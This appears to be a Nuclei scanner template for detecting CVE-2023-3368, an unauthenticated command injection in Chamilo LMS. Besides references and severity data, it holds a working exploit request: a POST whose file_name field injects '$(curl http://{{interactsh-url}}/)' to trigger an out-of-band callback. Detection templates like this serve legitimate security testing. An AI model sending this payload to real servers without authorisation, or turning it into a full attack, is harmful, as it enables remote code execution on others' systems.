id: CVE-2023-3368 info: name: Chamilo LMS <= v1.11.20 Unauthenticated Command Injection author: dwisiswant0 severity: critical description: | Command injection in `/main/webservices/additional_webservices.php` in Chamilo LMS <= v1.11.20 allows unauthenticated attackers to obtain remote code execution via improper neutralisation of special characters. reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-3368 - https://starlabs.sg/advisories/23/23-3368/ - https://support.chamilo.org/projects/chamilo-18/wiki/security_issues#Issue-121-2023-07-05-Critical-impact-High-risk-Unauthenticated-Command-Injection-CVE-2023-3368 - https://github.com/chamilo/chamilo-lms/commit/37be9ce7243a30259047dd4517c48ff8b21d657a - https://https://github.com/chamilo/chamilo-lms/commit/4c69b294f927db62092e01b70ac9bd6e32d5b48b classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-3368 cwe-id: CWE-78 epss-score: 0.93283 epss-percentile: 0.99063 cpe: cpe:2.3:a:chamilo:chamilo:*:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 vendor: chamilo product: chamilo shodan-query: http.component:"Chamilo" tags: cve2023,cve,chamilo,unauth,cmd,rce http: - method: POST path: - "{{BaseURL}}/main/webservices/additional_webservices.php" headers: Content-Type: application/xml body: | file_data file_name $(curl http://{{interactsh-url}}/) service_ppt2lp_size 720x540 matchers-condition: and matchers: - type: status status: - 200 - type: word words: - "wsConvertPptResponse" part: body - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" # digest: 4b0a00483046022100f131e049a903929669620739a042ef371cc53d14f7e330b5b1dd0a50032adb2e022100c65b26151fa200111cc70cbf4e292e7de91799cdd5ec182bf139fc69896ec655:922c64590222798bb761d5b6d8e72950